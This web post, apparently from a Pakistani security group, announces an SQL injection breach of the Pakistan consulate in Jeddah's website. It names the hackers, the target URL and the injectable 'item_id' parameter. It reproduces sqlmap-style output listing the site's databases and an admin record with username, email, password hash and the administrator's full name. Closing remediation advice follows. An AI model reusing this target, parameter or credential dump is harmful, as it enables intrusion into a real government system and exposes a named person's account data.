Pakistan Embassy Jeddah – SQL vuln (Exploited)

Cybercrime Markets
November 27, 2015
Pakistani Websites Vulnerable To Sql Injection Hacked
November 27, 2015
Cybercrime Markets
November 27, 2015
Pakistani Websites Vulnerable To Sql Injection Hacked
November 27, 2015

Pakistan Embassy Jeddah – SQL vuln (Exploited)

 

Hacked Website : http://www.pakconsulatejeddah.gov.pk/

Vuln : SQL Injection

Level : 6/10

Authorities Notified : Yes (NATIONAL RESPONSE CENTRE FOR CYBER CRIME)
Date : 27 Nov 2015
Method : Email Advisory
Proof Of Code / Hackers Information (Provided Below) :

Operation planned by: Mr.Instinct
Main Contributors: Xtam4, Axid Burn and Balalaika.

Main Target: http://www.pakconsulatejeddah.gov.pk/index.php

[*] starting at 15:13:28

[15:30:01] [INFO] GET parameter ‘item_id’ is ‘MySQL UNION query (NULL) – 1 to 20 columns’ injectable
GET parameter ‘item_id’ is vulnerable.

back-end DBMS: MySQL 5.0.11
[15:32:31] [INFO] fetching database names
[15:32:47] [INFO] the SQL query used returns 3 entries
[15:32:49] [INFO] retrieved: “information_schema”
[15:32:50] [INFO] retrieved: “pakcons_consulate”
[15:32:58] [INFO] retrieved: “pakcons_tns”
available databases [3]:
[*] information_schema
[*] pakcons_consulate
[*] pakcons_tns
Database: pakcons_consulate
Table: admin
[1 entry]
+—-+———————-+————-+———————————-+————–+
| id | email | username | password | full_name |
+—-+———————-+————-+———————————-+————–+
| 1 | [email protected] | pakadmincon | 1c6770d0e097b9a1dc3b76767991ba85 | M. Amir Khan |
+—-+———————-+————-+———————————-+————–+

Advisory :

Please escape user input parameter ‘item_id’.

Primary Defenses:

Option #1: Use of Prepared Statements (Parameterized Queries)
Option #2: Use of Stored Procedures
Option #3: Escaping all User Supplied Input
Additional Defenses:

Also Enforce: Least Privilege
Also Perform: White List Input Validation

For more info please visit : https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

For any more Advisory and information please feel free to contact us on [email protected].

………………….


Tier3 Cyber Security Solutions
Islamabad
Pakistan
www.tier3.xyz
#opsec Pakistan

#pakistan #hack #website #tier3 #alert

Comments are closed.

Pakistan Embassy Jeddah –  SQL vuln (Exploited)
We value your privacy
We use cookies to enhance your browsing experience, serve personalized content, and analyze our traffic. By clicking "Accept All", and by using this website you agree to our Cookies and Data Protection Policy.
Read more